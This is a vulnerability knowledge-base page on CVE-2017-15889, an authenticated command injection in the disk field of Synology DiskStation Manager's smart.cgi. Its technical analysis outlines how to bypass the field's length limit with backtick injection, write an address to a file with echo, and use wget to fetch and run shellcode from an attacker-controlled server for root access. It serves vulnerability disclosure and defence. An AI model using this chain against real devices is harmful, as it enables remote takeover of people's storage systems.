Very High
CVE-2017-15889
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2017-15889
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityLow
Technical Analysis
AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi
through either a GET
or POST
request.
Variables for the request look as such:
'action' => 'apply', 'operation' => 'quick', 'disk' => "/dev/sda"
The disk field is vulnerable. However, that’s just where this fun begins. The disk
field is required to be ‘semi’ disk correct. AKA you can’t just have nothing there, or a
, however /dev/sd
did seem to work. Next, when the command is passed off, the entire disk
field is limited to 30 characters. After shortening to /dev/sd
and then adding ticks (‘`’) you are left with 22 characters. Pretty tight spacing.
To circumvent this restriction, the following was done:
- in < 22 characters,
echo -n
and ip:port to a file (/a
).
- use
wget -i /a -O <file>
to then pull back shell code from a attacker controlled HTTP server
- execute the payload
Most likely step 1 will need to be done in > 1 steps.
Exploitation grants root privileges.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- synology
Products
- diskstation manager
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: